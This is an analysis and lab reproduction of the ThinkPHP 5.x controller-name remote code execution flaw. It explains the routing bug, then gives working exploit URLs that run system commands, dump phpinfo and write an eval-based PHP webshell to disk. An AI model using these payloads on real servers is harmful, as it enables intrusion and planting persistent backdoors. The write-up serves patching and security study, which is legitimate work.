ThinkPHP 5.x remote command execution vulnerability analysis and reproduction

0x00 Foreword

ThinkPHP officially released an important security update on December 9, 2018, which fixed a serious remote code execution vulnerability. This update mainly involves a security update. Since the framework does not perform enough detection on the controller name, it will lead to a possible getshell vulnerability when forced routing is not turned on. The affected versions include versions 5.0 and 5.1. It is recommended to update to the latest version as soon as possible. .

0x01 Scope of Impact

5.x

0x02 Vulnerability Analysis

Thinkphp v5.0.x patch address: https://github.com/top-think/framework/com...

Thinkphp v5.1 .x patch address: https://github.com/top-think/framework/com...

The controller part of the routing information has been filtered. It can be seen that the problem occurs in the routing

Key code during scheduling:

Before the repair, the program did not filter the controller, allowing the attacker to call any class method by introducing the \ symbol .

The $this->app->controller method is used to instantiate the controller, and then calls the methods in the instance. Follow up with the controller method:

The parseModuleAndClass method parses out $module and $class, and then instantiates $class.

In the parseModuleAndClass method, when $name starts with a backslash \, it is used directly as the class name. Taking advantage of the characteristics of the namespace, if you can control the $name here (that is, the controller part of the route), you can instantiate any class.

Next, let’s look back at the routing parsing code. The route/dispatch/Url.php::parseUrl method calls route/Rule.php::parseUrlPath to parse the routing information in pathinfo

The code is relatively simple, just use / Splits $url without any filtering.

The routing url is obtained from Request::path ()

Since the default configuration of var_pathinfo is s, we can use $_GET ['s '] to pass routing information, you can also use pathinfo to pass, but during testing, the \ in $_SERVER ['pathinfo'] will be replaced with / in the windows environment. Combined with the previous analysis, the preliminary utilization code can be obtained as follows: index.php?s=index/\namespace\class/method, which will instantiate the \namespace\class class and execute the method method.

0x03 Vulnerability Exploitation

docker vulnerability environment source code:https://github.com/vulnspy/thinkphp-5.1.29

Local environment: thinkphp5.0.15 php5.6n apache2.0

http://www.thinkphp.cn/donate/download/id/...

1. Use the system function to execute remote commands

http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2. Use the phpinfo function to write out the information of phpinfo ()

http://localhost:9096/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

3. Write shell:

http://localhost:9096/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

or

http://localhost:9096/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo &#39;ok&#39;;?>

The above is the detailed content of ThinkPHP 5.x remote command execution vulnerability analysis and reproduction. For more information, please follow other related articles on the PHP Chinese website!